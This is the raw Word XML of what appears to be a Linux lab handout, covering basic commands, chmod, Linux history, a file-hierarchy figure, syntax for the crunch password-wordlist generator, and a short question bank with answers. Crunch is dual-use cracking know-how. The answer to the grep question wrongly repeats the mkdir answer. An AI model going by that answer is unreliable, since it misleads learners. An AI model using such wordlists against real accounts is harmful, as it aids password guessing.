            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37EFD349" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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Execute basic commands of Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="068965F9" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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Use CHMOD command to change the privileges and permissions</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6019BBC0"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3B416EC4" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F0B394"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4D25FEB8" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45A9BD66" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>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Linux word derived and evolved from UNIX. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD3C2C1" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>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Unix was the first operating system came to existence with CLI environment and mainly used for server side working as per today's requirements. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E331A5" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>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It is the most flexible and customizable OS used by skilled individuals.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F43E04" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:spacing w:after="0"/>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It is an open source</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFBE657" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DC044A3" w14:textId="3BF4D8B2" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720" w:hanging="803"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0350EDDD" wp14:editId="52C1D841">
                  <wp:extent cx="5926455" cy="3232150"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="8194" name="Picture 2" descr="Linux File Hierarchy Structure - GeeksforGeeks">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF00B47-B983-41D6-B986-237FC15C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inux File Hierarchy Structure - GeeksforGeeks">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF00B47-B983-41D6-B986-237FC15C4C0A}"/>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26455" cy="3232150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B29E999" w14:textId="51F3709E" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720" w:hanging="803"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48630F23" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B4885DD" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48442216" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:p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Crunch </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Min.Value</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Max.Value</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DC85AC" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F0115F7" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:p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 xml:space="preserve"> Example – </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B46F96" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50299293" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:p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ab/>
              <w:t>crunch 4 4 0123456789</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E8FD5F" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="033435AB" w14:textId="364D1BE6" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720" w:hanging="803"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47342018" wp14:editId="35C014E2">
                  <wp:extent cx="5926455" cy="1252855"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:docPr id="1" name="Picture 2">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AD0FE0-4487-45E3-A3FE-7A134DD4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E2AD0FE0-4487-45E3-A3FE-7A134DD4DA28}"/>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6455" cy="1252855"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="42584511" w14:textId="4F5E7A87" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720" w:hanging="803"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="768F6408" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720" w:hanging="803"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6416016C" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001138A0" w:rsidRPr="001C411D" w14:paraId="5D521B2D" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58432992" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0"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lastRenderedPageBreak/>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239EB41C" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A70697F" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0"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ich command is used to make a directory in LINUX?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E4163E" w14:textId="373EB25F" w:rsidR="00EB12CB" w:rsidRDefault="00EB12CB" w:rsidP="00B576DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB12CB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The command used to make a directory in LINUX is "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB12CB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB12CB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">". For example, to create a </w:t>
            </w:r>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>directory named "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mydir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>", the command would be "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mydir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="673A7422" w14:textId="77777777" w:rsidR="00EB12CB" w:rsidRPr="00EB12CB" w:rsidRDefault="00EB12CB" w:rsidP="00EB12CB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="658BE003" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0"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at is the use of grep command?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60ED9AD6" w14:textId="41578756" w:rsidR="00EB12CB" w:rsidRDefault="00B576DA" w:rsidP="00B576DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>The command used to make a directory in LINUX is "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>". For example, to create a directory named "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mydir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>", the command would be "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>mydir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B1DBC53" w14:textId="77777777" w:rsidR="00B576DA" w:rsidRPr="00B576DA" w:rsidRDefault="00B576DA" w:rsidP="00B576DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="421DB9BE" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0"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ich command is used to find out all the information about the OS?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0956C0AD" w14:textId="1C27350A" w:rsidR="00B576DA" w:rsidRPr="00B576DA" w:rsidRDefault="00B576DA" w:rsidP="00B576DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The command used to find out all the information about the OS in LINUX is "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>". It is used to display system information such as the kernel name, operating system, machine hardware name, and more. The command syntax is "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
